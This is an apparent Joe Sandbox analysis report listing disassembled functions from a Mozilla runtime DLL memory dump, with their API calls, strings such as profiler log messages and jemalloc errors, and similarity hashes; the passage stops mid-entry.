LoadLibraryW.KERNEL32(combase.dll,00000000,?,6CBBD9F0,00000000), ref: 6CB90F1D
GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 6CB90F3C
__Init_thread_footer.LIBCMT ref: 6CB90F50
FreeLibrary.KERNEL32(?,6CBBD9F0,00000000), ref: 6CB90F86

Strings

combase.dll, xrefs: 6CB90F18
CoInitializeEx, xrefs: 6CB90F36

Memory Dump Source

Source File: 00000000.00000002.1689033198.000000006CB81000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB80000, based on PE: true

Associated: 00000000.00000002.1689014684.000000006CB80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689084512.000000006CBFD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689106840.000000006CC0E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689125183.000000006CC12000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb80000_file.jbxd

Similarity

API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
String ID: CoInitializeEx$combase.dll
API String ID: 4190559335-2063391169
Opcode ID: b9205b179967466eb81c40f5e18f418e741bd597a5ccf2d58e25ea26a4e54661
Instruction ID: 93af22a8260fb46f6a07c03abbe8fc12b292d0509112853f9adec64dddcfe90c
Opcode Fuzzy Hash: b9205b179967466eb81c40f5e18f418e741bd597a5ccf2d58e25ea26a4e54661
Instruction Fuzzy Hash: F711C2757052809FDF40CF54D908F5A37B4FB4F325F01422DEA1692780D732A545CA5A

Function 6CBCF540 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6CBC9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CB94A68), ref: 6CBC945E
Part of subcall function 6CBC9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CBC9470
Part of subcall function 6CBC9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CBC9482
Part of subcall function 6CBC9420: __Init_thread_footer.LIBCMT ref: 6CBC949F

GetCurrentThreadId.KERNEL32 ref: 6CBCF559
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CBCF561

Part of subcall function 6CBC94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6CBC94EE
Part of subcall function 6CBC94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6CBC9508

GetCurrentThreadId.KERNEL32 ref: 6CBCF577
AcquireSRWLockExclusive.KERNEL32(6CC0F4B8), ref: 6CBCF585
ReleaseSRWLockExclusive.KERNEL32(6CC0F4B8), ref: 6CBCF5A3

Strings

[D %d/%d] profiler_add_sampled_counter(%s), xrefs: 6CBCF56A
[I %d/%d] profiler_pause_sampling, xrefs: 6CBCF3A8
[I %d/%d] profiler_resume, xrefs: 6CBCF239
[I %d/%d] profiler_resume_sampling, xrefs: 6CBCF499

Memory Dump Source

Source File: 00000000.00000002.1689033198.000000006CB81000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB80000, based on PE: true

Associated: 00000000.00000002.1689014684.000000006CB80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689084512.000000006CBFD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689106840.000000006CC0E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689125183.000000006CC12000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb80000_file.jbxd

Similarity

API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
String ID: [D %d/%d] profiler_add_sampled_counter(%s)$[I %d/%d] profiler_pause_sampling$[I %d/%d] profiler_resume$[I %d/%d] profiler_resume_sampling
API String ID: 2848912005-2840072211
Opcode ID: 4e96797ae2ca4b50e0b283e64233a2b09f694c6efe0d9307241564075540fde5
Instruction ID: 3925aa375ec593e0b4abecd789fb525f76e55e29251d4ea9eccc5520129b2d46
Opcode Fuzzy Hash: 4e96797ae2ca4b50e0b283e64233a2b09f694c6efe0d9307241564075540fde5
Instruction Fuzzy Hash: 1EF054767002449FEE00AB65D85895AB77DEB8629DF110059FE1583701DB774C058776

Function 6CBCF600 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6CBC9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CB94A68), ref: 6CBC945E
Part of subcall function 6CBC9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CBC9470
Part of subcall function 6CBC9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CBC9482
Part of subcall function 6CBC9420: __Init_thread_footer.LIBCMT ref: 6CBC949F

GetCurrentThreadId.KERNEL32 ref: 6CBCF619
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,6CBCF598), ref: 6CBCF621

Part of subcall function 6CBC94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6CBC94EE
Part of subcall function 6CBC94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6CBC9508

GetCurrentThreadId.KERNEL32 ref: 6CBCF637
AcquireSRWLockExclusive.KERNEL32(6CC0F4B8,?,?,00000000,?,6CBCF598), ref: 6CBCF645
ReleaseSRWLockExclusive.KERNEL32(6CC0F4B8,?,?,00000000,?,6CBCF598), ref: 6CBCF663

Strings

[D %d/%d] profiler_remove_sampled_counter(%s), xrefs: 6CBCF62A

Memory Dump Source

Source File: 00000000.00000002.1689033198.000000006CB81000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB80000, based on PE: true

Associated: 00000000.00000002.1689014684.000000006CB80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689084512.000000006CBFD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689106840.000000006CC0E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689125183.000000006CC12000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb80000_file.jbxd

Similarity

API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
String ID: [D %d/%d] profiler_remove_sampled_counter(%s)
API String ID: 2848912005-753366533
Opcode ID: e5d017e6c09cae6a9edbc45a97cb75f13ca9959da92da5331807e07196ab299c
Instruction ID: dc15238999018f34d63fe8e24c9baf4a0f770bc759481afa5b5d69e5d5ab9afb
Opcode Fuzzy Hash: e5d017e6c09cae6a9edbc45a97cb75f13ca9959da92da5331807e07196ab299c
Instruction Fuzzy Hash: 6DF08975700244AFEF00AB65C85895AB77DEB8629DF110069FE1583741DB774C05C776

Function 6CBC05F0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 31stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(<jemalloc>,?,?,?,?,6CBBCFAE,?,?,?,6CB831A7), ref: 6CBC05FB
_write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,<jemalloc>,00000000,6CBBCFAE,?,?,?,6CB831A7), ref: 6CBC0616
strlen.API-MS-WIN-CRT-STRING-L1-1-0(: (malloc) Error in VirtualFree(),?,?,?,?,?,?,?,6CB831A7), ref: 6CBC061C
_write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,: (malloc) Error in VirtualFree(),00000000,?,?,?,?,?,?,?,?,6CB831A7), ref: 6CBC0627

Strings

: (malloc) Error in VirtualFree(), xrefs: 6CBC061B, 6CBC0625
<jemalloc>, xrefs: 6CBC05FA, 6CBC060F

Memory Dump Source

Source File: 00000000.00000002.1689033198.000000006CB81000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB80000, based on PE: true

Associated: 00000000.00000002.1689014684.000000006CB80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689084512.000000006CBFD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689106840.000000006CC0E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689125183.000000006CC12000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb80000_file.jbxd

Similarity

API ID: _writestrlen
String ID: : (malloc) Error in VirtualFree()$<jemalloc>
API String ID: 2723441310-2186867486
Opcode ID: bf5f89a643c1da66251cf22074caf5b10eb3f12b6a163b36977196ec2aa1318b
Instruction ID: 3f8ac983808cd2753f541f21e8ba50d11969e6af7b402aa7631b3ef33860312d
Opcode Fuzzy Hash: bf5f89a643c1da66251cf22074caf5b10eb3f12b6a163b36977196ec2aa1318b
Instruction Fuzzy Hash: 62E08CE2A0105037F5246256AC86DBB761CDBC6174F080039FD0D83301EA9AAD2E51F6

Function 6CB905F0 Relevance: 9.2, APIs: 6, Instructions: 226COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1689033198.000000006CB81000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB80000, based on PE: true

Associated: 00000000.00000002.1689014684.000000006CB80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689084512.000000006CBFD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689106840.000000006CC0E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689125183.000000006CC12000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb80000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66f037c710f1899878feaa5c2379834fa6bc75ebed459fabd8d1c51a3d674ca4
Instruction ID: 9632464d31a03b0ca439001bb27ede9012f2e4c6a6cf5858cb1f0f22266108df
Opcode Fuzzy Hash: 66f037c710f1899878feaa5c2379834fa6bc75ebed459fabd8d1c51a3d674ca4
Instruction Fuzzy Hash: 30A15AB0A00685CFDB24CF29D594A9AFBF1FF4A314F04866ED44A97B01E731A985CF91

Function 6CBE14A0 Relevance: 9.2, APIs: 6, Instructions: 176threadtimeCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6CBE14C5
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6CBE14E2
GetCurrentThreadId.KERNEL32 ref: 6CBE1546
InitializeConditionVariable.KERNEL32(?), ref: 6CBE15BA
free.MOZGLUE(?), ref: 6CBE16B4

Memory Dump Source

Source File: 00000000.00000002.1689033198.000000006CB81000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB80000, based on PE: true

Associated: 00000000.00000002.1689014684.000000006CB80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689084512.000000006CBFD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689106840.000000006CC0E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689125183.000000006CC12000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb80000_file.jbxd

Similarity

API ID: CurrentThread$ConditionInitializeNow@Stamp@mozilla@@TimeV12@_Variablefree
String ID:
API String ID: 1909280232-0
Opcode ID: 27a193537b333a839b01c868f9c9aa79acd632a5d7153d2f4097727b75c603ac
Instruction ID: bd49c82392ce6445c24e0006a2fddcdabb86c3cb3f96c591c19265d9d0c8a0d2
Opcode Fuzzy Hash: 27a193537b333a839b01c868f9c9aa79acd632a5d7153d2f4097727b75c603ac
Instruction Fuzzy Hash: 7F61CC75A007809FDB118F25C880B9EB7B4FF89748F59851CED8A57602DB31E989CB92

Function 6CBDDC50 Relevance: 9.1, APIs: 6, Instructions: 104timethreadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6CBDDC60
AcquireSRWLockExclusive.KERNEL32(?,?,?,6CBDD38A,?), ref: 6CBDDC6F
free.MOZGLUE(?,?,?,?,?,6CBDD38A,?), ref: 6CBDDCC1
ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,6CBDD38A,?), ref: 6CBDDCE9
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,6CBDD38A,?), ref: 6CBDDD05
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000001,?,?,?,6CBDD38A,?), ref: 6CBDDD4A

Memory Dump Source

Source File: 00000000.00000002.1689033198.000000006CB81000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB80000, based on PE: true

Associated: 00000000.00000002.1689014684.000000006CB80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689084512.000000006CBFD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689106840.000000006CC0E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689125183.000000006CC12000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb80000_file.jbxd

Similarity

API ID: ExclusiveLockStampTimeV01@@Value@mozilla@@$AcquireCurrentReleaseThreadfree
String ID:
API String ID: 1842996449-0
Opcode ID: 2151414a43a493803c06df35ed7f5b767ff7674861c8f4942888ffc41120d0f5
Instruction ID: 9106d9b216954e3331913ceefdba33f08bc63e7f82c26e63f568db7fe8210ff6
Opcode Fuzzy Hash: 2151414a43a493803c06df35ed7f5b767ff7674861c8f4942888ffc41120d0f5
Instruction Fuzzy Hash: 914157B5A00616DFCB00CFA9D88099EB7B5FF88314B5A4569D945ABB10D731FC00CFA0

Function 6CBC6590 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 342COMMON

Download Yara Rule

APIs

Part of subcall function 6CBBFA80: GetCurrentThreadId.KERNEL32 ref: 6CBBFA8D
Part of subcall function 6CBBFA80: AcquireSRWLockExclusive.KERNEL32(6CC0F448), ref: 6CBBFA99

ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CBC6727
?GetOrAddIndex@UniqueJSONStrings@baseprofiler@mozilla@@AAEIABV?$Span@$$CBD$0PPPPPPPP@@3@@Z.MOZGLUE(?,?,?,?,?,?,?,00000001), ref: 6CBC67C8

Part of subcall function 6CBD4290: memcpy.VCRUNTIME140(?,?,6CBE2003,6CBE0AD9,?,6CBE0AD9,00000000,?,6CBE0AD9,?,00000004,?,6CBE1A62,?,6CBE2003,?), ref: 6CBD42C4

Strings

data, xrefs: 6CBC6593

Memory Dump Source

Source File: 00000000.00000002.1689033198.000000006CB81000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB80000, based on PE: true

Associated: 00000000.00000002.1689014684.000000006CB80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689084512.000000006CBFD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689106840.000000006CC0E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689125183.000000006CC12000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb80000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentIndex@P@@3@@ReleaseSpan@$$Strings@baseprofiler@mozilla@@ThreadUniquememcpy
String ID: data
API String ID: 511789754-2918445923
Opcode ID: 95d3682ceaf57206b4ff36672b7b534e4602b3311f6247b3b7dcd54ecec8082e
Instruction ID: afb4ae974d798dc113e292952154b0dc70dccd7c55c5d52d69f32a0c76ccf30f
Opcode Fuzzy Hash: 95d3682ceaf57206b4ff36672b7b534e4602b3311f6247b3b7dcd54ecec8082e
Instruction Fuzzy Hash: 7FD1BC75B083808FD724CF24D851BAEB7E5AFD5308F10492EE48A97B51EB31A949CB53

Function 6CBBD5D0 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 279COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000001,?,?,?,?,6CB8EB57,?,?,?,?,?,?,?,?,?), ref: 6CBBD652
memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,6CB8EB57,?), ref: 6CBBD660
free.MOZGLUE(?,?,?,?,?,?,?,?,?,6CB8EB57,?), ref: 6CBBD673
free.MOZGLUE(?), ref: 6CBBD888

Strings

|Enabled, xrefs: 6CBBD81E

Memory Dump Source

Source File: 00000000.00000002.1689033198.000000006CB81000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB80000, based on PE: true

Associated: 00000000.00000002.1689014684.000000006CB80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689084512.000000006CBFD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689106840.000000006CC0E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689125183.000000006CC12000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb80000_file.jbxd

Similarity

API ID: free$memsetmoz_xmalloc
String ID: |Enabled
API String ID: 4142949111-2633303760
Opcode ID: b6978ae3fbd1a478f188b261562d894a79362ca513a6a3540a07d3f638a6f1eb
Instruction ID: fb2bfe58f1e8ac9b10876d19936584a97898e68bc6d0c978e3860eabb2024a53
Opcode Fuzzy Hash: b6978ae3fbd1a478f188b261562d894a79362ca513a6a3540a07d3f638a6f1eb
Instruction Fuzzy Hash: DFA1F4B0A002858FDB10CF79D8907EEBBF1EF49318F18815CD895AB745DB39A945CBA1

Function 6CBBF440 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 103fileCOMMON

Download Yara Rule

APIs

GetFileInformationByHandle.KERNEL32(00000000,?), ref: 6CBBF480

Part of subcall function 6CB8F100: LoadLibraryW.KERNEL32(shell32,?,6CBFD020), ref: 6CB8F122
Part of subcall function 6CB8F100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6CB8F132

CloseHandle.KERNEL32(00000000), ref: 6CBBF555

Part of subcall function 6CB914B0: wcslen.API-MS-WIN-CRT-STRING-L1-1-0(6CB91248,6CB91248,?), ref: 6CB914C9
Part of subcall function 6CB914B0: memcpy.VCRUNTIME140(?,6CB91248,00000000,?,6CB91248,?), ref: 6CB914EF

Part of subcall function 6CB8EEA0: memcpy.VCRUNTIME140(?,?,?), ref: 6CB8EEE3

CreateFileW.KERNEL32 ref: 6CBBF4FD
GetFileInformationByHandle.KERNEL32(00000000), ref: 6CBBF523

Strings

\oleacc.dll, xrefs: 6CBBF4CB

Memory Dump Source

Source File: 00000000.00000002.1689033198.000000006CB81000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB80000, based on PE: true

Associated: 00000000.00000002.1689014684.000000006CB80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689084512.000000006CBFD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689106840.000000006CC0E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689125183.000000006CC12000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb80000_file.jbxd

Similarity

API ID: FileHandle$Informationmemcpy$AddressCloseCreateLibraryLoadProcwcslen
String ID: \oleacc.dll
API String ID: 2595878907-3839883404
Opcode ID: 42c4488228134f7c990ae118224db0e84d8cfe3dd26872ad6410f6aa65af96b5
Instruction ID: 63f8baf7ad6d68bcf330bf1227e38d4305bb8c69f4973197bc27fd1e53f34e00
Opcode Fuzzy Hash: 42c4488228134f7c990ae118224db0e84d8cfe3dd26872ad6410f6aa65af96b5
Instruction Fuzzy Hash: 754191346087909FE720DF79C984AABB7F4EF45318F504A1CF5A593650EB30D989CB92

Function 6CBE74A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(00000000), ref: 6CBE7526
__Init_thread_footer.LIBCMT ref: 6CBE7566
__Init_thread_footer.LIBCMT ref: 6CBE7597

Strings

kernel32.dll, xrefs: 6CBE7557
UnmapViewOfFile2, xrefs: 6CBE7552

Memory Dump Source

Source File: 00000000.00000002.1689033198.000000006CB81000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB80000, based on PE: true

Associated: 00000000.00000002.1689014684.000000006CB80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689084512.000000006CBFD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689106840.000000006CC0E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689125183.000000006CC12000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb80000_file.jbxd

Similarity

API ID: Init_thread_footer$ErrorLast
String ID: UnmapViewOfFile2$kernel32.dll
API String ID: 3217676052-1401603581
Opcode ID: b01e79e13904c9f9f34f573362d1ca904eeb007432724d1f26a7359ddb723384
Instruction ID: f5ae921e7304256208f63f2779c50cb23347b7b5121df76be6e4c7bbfc6d828c
Opcode Fuzzy Hash: b01e79e13904c9f9f34f573362d1ca904eeb007432724d1f26a7359ddb723384
Instruction Fuzzy Hash: 96212C31B00581AFDA14DFEDC814E5D33B5EB4ABA6F01052CE50567F41DBB2AC82CA5B

Function 6CBEC410 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(ntdll.dll,?,6CBEC0E9), ref: 6CBEC418
GetProcAddress.KERNEL32(00000000,NtQueryVirtualMemory), ref: 6CBEC437
FreeLibrary.KERNEL32(?,6CBEC0E9), ref: 6CBEC44C

Strings

ntdll.dll, xrefs: 6CBEC413
NtQueryVirtualMemory, xrefs: 6CBEC431

Memory Dump Source

Source File: 00000000.00000002.1689033198.000000006CB81000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB80000, based on PE: true

Associated: 00000000.00000002.1689014684.000000006CB80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689084512.000000006CBFD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689106840.000000006CC0E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689125183.000000006CC12000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb80000_file.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: NtQueryVirtualMemory$ntdll.dll
API String ID: 145871493-2623246514
Opcode ID: eea3425b22d69751b3dc3f56da9a675148bbdd12eeef087efc28a206099d1db1
Instruction ID: 0a54679bfe95998753455ec85fb6b65c3a1c07b9b51072cbf738e6c630f1cceb
Opcode Fuzzy Hash: eea3425b22d69751b3dc3f56da9a675148bbdd12eeef087efc28a206099d1db1
Instruction Fuzzy Hash: CEE092747053019FDB00AB718918B527FF8F70B684F12421EAA1492780EBB2C9418A59

Function 6CBE75B0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(ntdll.dll,?,6CBE748B,?), ref: 6CBE75B8
GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 6CBE75D7
FreeLibrary.KERNEL32(?,6CBE748B,?), ref: 6CBE75EC

Strings

ntdll.dll, xrefs: 6CBE75B3
RtlNtStatusToDosError, xrefs: 6CBE75D1

Memory Dump Source

Source File: 00000000.00000002.1689033198.000000006CB81000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB80000, based on PE: true

Associated: 00000000.00000002.1689014684.000000006CB80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689084512.000000006CBFD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689106840.000000006CC0E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689125183.000000006CC12000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb80000_file.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: RtlNtStatusToDosError$ntdll.dll
API String ID: 145871493-3641475894
Opcode ID: ad63f67aa7955091c251fe166a850b20c88b50efa7d6d7e45d561805c6f060aa
Instruction ID: bd152c4a34e67346689fe03c9f586b49879d0250e6fe2eb4ebdab24fa9b50600
Opcode Fuzzy Hash: ad63f67aa7955091c251fe166a850b20c88b50efa7d6d7e45d561805c6f060aa
Instruction Fuzzy Hash: D1E09A71708301AFDB019FA9C8587027AF8EB06656F12402DE915E1641EBF384C1CF56

Function 6CBE7600 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(ntdll.dll,?,6CBE7592), ref: 6CBE7608
GetProcAddress.KERNEL32(00000000,NtUnmapViewOfSection), ref: 6CBE7627
FreeLibrary.KERNEL32(?,6CBE7592), ref: 6CBE763C

Strings

ntdll.dll, xrefs: 6CBE7603
NtUnmapViewOfSection, xrefs: 6CBE7621

Memory Dump Source

Source File: 00000000.00000002.1689033198.000000006CB81000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB80000, based on PE: true

Associated: 00000000.00000002.1689014684.000000006CB80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689084512.000000006CBFD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689106840.000000006CC0E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689125183.000000006CC12000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb80000_file.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: NtUnmapViewOfSection$ntdll.dll
API String ID: 145871493-1050664331
Opcode ID: 8364b5649256a7e40c9491a09d19dec515f22cf066ea25645718ddefe1f118b8
Instruction ID: 488d567932206a9f0f6842de61a5da1f98749ffc2821b3bc5f99540a7235d7a9
Opcode Fuzzy Hash: 8364b5649256a7e40c9491a09d19dec515f22cf066ea25645718ddefe1f118b8
Instruction Fuzzy Hash: A3E0BF707043419FDF419FA9C8187067AB8F71A79AF12411DEA15D1741EBB384808F1A

Function 6CBD8E00 Relevance: 7.6, APIs: 6, Instructions: 147COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,?,6CBCB58D,?,?,?,?,?,?,?,6CBFD734,?,?,?,6CBFD734), ref: 6CBD8E6E
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,?,6CBCB58D,?,?,?,?,?,?,?,6CBFD734,?,?,?,6CBFD734), ref: 6CBD8EBF
free.MOZGLUE(?,?,?,?,6CBCB58D,?,?,?,?,?,?,?,6CBFD734,?,?,?), ref: 6CBD8F24
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,?,6CBCB58D,?,?,?,?,?,?,?,6CBFD734,?,?,?,6CBFD734), ref: 6CBD8F46
free.MOZGLUE(?,?,?,?,6CBCB58D,?,?,?,?,?,?,?,6CBFD734,?,?,?), ref: 6CBD8F7A
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,6CBCB58D,?,?,?,?,?,?,?,6CBFD734,?,?,?), ref: 6CBD8F8F

Memory Dump Source

Source File: 00000000.00000002.1689033198.000000006CB81000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB80000, based on PE: true

Associated: 00000000.00000002.1689014684.000000006CB80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689084512.000000006CBFD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689106840.000000006CC0E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689125183.000000006CC12000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb80000_file.jbxd

Similarity

API ID: freemalloc
String ID:
API String ID: 3061335427-0
Opcode ID: 304fa2c6983a933efa32dcffde17ffde4391bd1d84a6f8a016b7129d369eab62
Instruction ID: 40b892fc2cd57d15b10077f8b2dd23dc7318bdb0fddf01a2fdad58159ddf0827
Opcode Fuzzy Hash: 304fa2c6983a933efa32dcffde17ffde4391bd1d84a6f8a016b7129d369eab62
Instruction Fuzzy Hash: 355180B1A016568FEF14CF54D88076E73B2EB44319F16092AD516AB740E732F905CBD6

Function 6CB84DE0 Relevance: 7.6, APIs: 5, Instructions: 133stringCOMMON

Download Yara Rule

APIs

